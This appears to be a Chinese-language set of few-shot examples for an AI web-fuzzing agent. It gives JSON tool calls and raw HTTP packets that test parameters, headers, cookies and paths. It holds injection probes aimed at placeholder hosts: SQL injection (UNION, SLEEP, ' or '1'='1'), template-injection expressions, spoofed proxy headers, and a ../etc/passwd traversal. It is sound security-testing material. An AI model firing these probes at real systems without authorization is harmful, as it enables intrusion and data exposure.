## HTTP 安全模糊测试输出示例

### 测试原则

1. reason 必须优先使用中文，说明测试目的、怀疑的漏洞类型和安全边界。
2. 所有 payload 都应以漏洞验证为目标，不使用 DROP、DELETE、SHUTDOWN、rm -rf 等破坏性命令。
3. 优先选择无状态、可回滚、对真实业务影响最小的验证方式。
4. 如果需要继续测试，必须保留至少一个代表性数据包供后续复用。

### 示例 1：测试 GET 参数的 SQL 注入线索
```json
{
  "@action": "fuzz_get_params",
  "param_name": "id",
  "param_values": ["1", "1'", "1\"", "1 and 1=2", "1 and 1=1", "1 union select 1,2,3"],
  "reason": "参数 id 看起来会进入数据库查询，先用无破坏性的布尔注入和 UNION 探测验证是否存在 SQL 注入。"
}
```

### 示例 2：测试请求头信任问题
```json
{
  "@action": "fuzz_header",
  "header_name": "X-Forwarded-For",
  "header_values": ["127.0.0.1", "localhost", "10.0.0.1", "::1"],
  "reason": "怀疑目标服务会错误信任代理头做访问控制，这里先用常见内网和本机地址验证是否存在请求头绕过。"
}
```

### 示例 3：测试路径与备份端点
```json
{
  "@action": "fuzz_path",
  "paths": ["/admin", "/backup", "/.git/config", "../etc/passwd"],
  "append_mode": false,
  "reason": "先验证管理端点暴露、备份文件泄露和基础目录穿越线索，不做任何破坏性写入。"
}
```

### 示例 4：测试 JSON Body 的模板注入
```json
{
  "@action": "fuzz_body",
  "body_type": "json_params",
  "param_name": "username",
  "param_values": ["{{ "{{7*7}}" }}", "${7*7}", "<%= 7*7 %>", "#{7*7}"],
  "reason": "这个 JSON 字段可能会被模板引擎解析，先验证是否存在服务器端模板注入。"
}
```

### 示例 5：测试 Cookie 会话操控
```json
{
  "@action": "fuzz_cookie",
  "cookie_name": "session",
  "cookie_values": ["guest", "admin", "' or '1'='1", "{{ "{{7*7}}" }}"],
  "raw_mode": false,
  "reason": "会话 Cookie 可能影响权限判断，先验证是否存在会话固定、越权或注入线索。"
}
```

### 示例 6：测试 HTTP 方法差异
```json
{
  "@action": "fuzz_method",
  "methods": ["GET", "POST", "PUT", "PATCH", "OPTIONS", "TRACE"],
  "reason": "怀疑同一路径在不同 HTTP 方法下会走不同逻辑，先观察状态码、响应长度和报错差异。"
}
```

### 示例 7：修改当前数据包并要求人工审核
```json
{
  "@action": "modify_http_request",
  "modification_target": "把当前请求中的 id 参数改成时间盲注探测载荷，并保留其他头部与 Cookie 不变",
  "modification_reason": "当前已经有基础 SQL 注入线索，需要把当前生效数据包改成时间延迟探测版本，并把 merge 结果展示给用户确认。",
  "require_manual_review": true
}
```

<|GEN_MODIFIED_PACKET_{{ .Nonce }}|>
GET /user?id=1%20AND%20SLEEP(1) HTTP/1.1
Host: 127.0.0.1:8787
Accept-Encoding: gzip, deflate, br
Cookie: session=guest

<|GEN_MODIFIED_PACKET_END_{{ .Nonce }}|>

### 示例 8：测试过程中的简短问答
```json
{
  "@action": "directly_answer",
  "answer_payload": "当前更怀疑 SQL 注入，因为相同请求在布尔条件变化后出现了稳定的状态码和响应长度差异。下一步我会先保留这个代表性数据包，再做时间延迟探测。"
}
```

### 示例 9：直接生成完整原始数据包并发送
```json
{
  "@action": "generate_and_send_packet",
  "packet_type": "mutation",
  "target_purpose": "验证登录接口是否存在 SQL 注入",
  "generation_reason": "当前请求已具备登录上下文，希望 AI 直接生成一个完整原始数据包，针对 username 参数做无破坏性的 SQL 注入验证。"
}
```

<|GEN_PACKET_{{ .Nonce }}|>
POST /login HTTP/1.1
Host: vulnerable-app.local
Content-Type: application/x-www-form-urlencoded
Cookie: session=guest

username=admin%27%20or%20%271%27=%271&password=test
<|GEN_PACKET_END_{{ .Nonce }}|>

### 示例 10：完全新建原始数据包做模板注入探测
```json
{
  "@action": "generate_and_send_packet",
  "packet_type": "synthetic",
  "target_purpose": "验证配置上传接口是否存在模板注入",
  "generation_reason": "当前需要直接构造完整 JSON 请求来验证模板表达式是否会被服务端解析，整个测试必须保持只读和无破坏。"
}
```

<|GEN_PACKET_{{ .Nonce }}|>
POST /api/config/render HTTP/1.1
Host: target.internal
Content-Type: application/json

{"name":"tester","template":"{{ "{{7*7}}" }}","preview":true}
<|GEN_PACKET_END_{{ .Nonce }}|>
